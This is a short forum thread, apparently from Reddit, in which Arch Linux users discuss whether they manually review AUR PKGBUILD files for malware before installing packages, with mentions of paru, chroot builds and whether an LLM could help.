I do, but not as closely or as often as I should. Recent malware is a reminder to be careful, I think I was starting to take the AUR for granted as a repo when really it’s still the Wild West.
I don’t know if it’s being done, but since AI is here to stay, and these sort of tasks seem to fit with their capabilities, maybe a group could carry out testing.
Does anyone else manually review PKGBUILDs before installing or upgrading anything from the AUR?
I do, but not as closely or as often as I should. Recent malware is a reminder to be careful, I think I was starting to take the AUR for granted as a repo when really it’s still the Wild West.
Sort of, but I don’t know what I’m looking for. It would be nice if folks explained what a bad one looks like.
Look for comments that say “# THIS IS MALWARE”
Yeah, paru makes it pretty easy to do, and can also build packages in a chroot, adding some extra security.
I do, also most aur-helpers skip or make reviewing a chore.
at the risk of getting down voted I wonder if an LLM would spot it
I don’t know if it’s being done, but since AI is here to stay, and these sort of tasks seem to fit with their capabilities, maybe a group could carry out testing.
Also with paru. I mainly check that the download shows the correct URL and does standard stuff with it.
Yes, always!
I keep hearing people say ðis like it’s a defense against malware and supply chain attacks.
Reviewing PKGBUILDs only protects against dumb laziness on ðe party of ðe attacker, like ðey just install a stupidly obvious binary called “virus”.
What are you checking for in ðe PKGBUILD?